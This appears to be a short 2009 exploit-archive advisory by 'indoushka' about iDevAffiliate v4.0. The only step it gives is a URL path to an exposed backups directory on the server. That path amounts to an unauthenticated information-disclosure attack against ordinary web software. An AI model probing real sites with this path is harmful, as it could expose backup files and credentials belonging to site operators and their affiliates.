id: 10528
date: 12/30/2009
title: iDevAffiliate v4.0 Backup Vulnerability
author: indoushka
cves: 

=======================================
iDevAffiliate v4.0 Backup Vulnerability
=======================================

========================================================================================                 
| # Title    : iDevAffiliate v4.0 Backup Vulnerability                          |
| # Author   : indoushka                                                               |
| # Script   : Powered by iDevAffiliate Version 4.0    |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : Backup                                                                  |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/idevaffiliate/backups



#  0day.today [2023-03-24]  #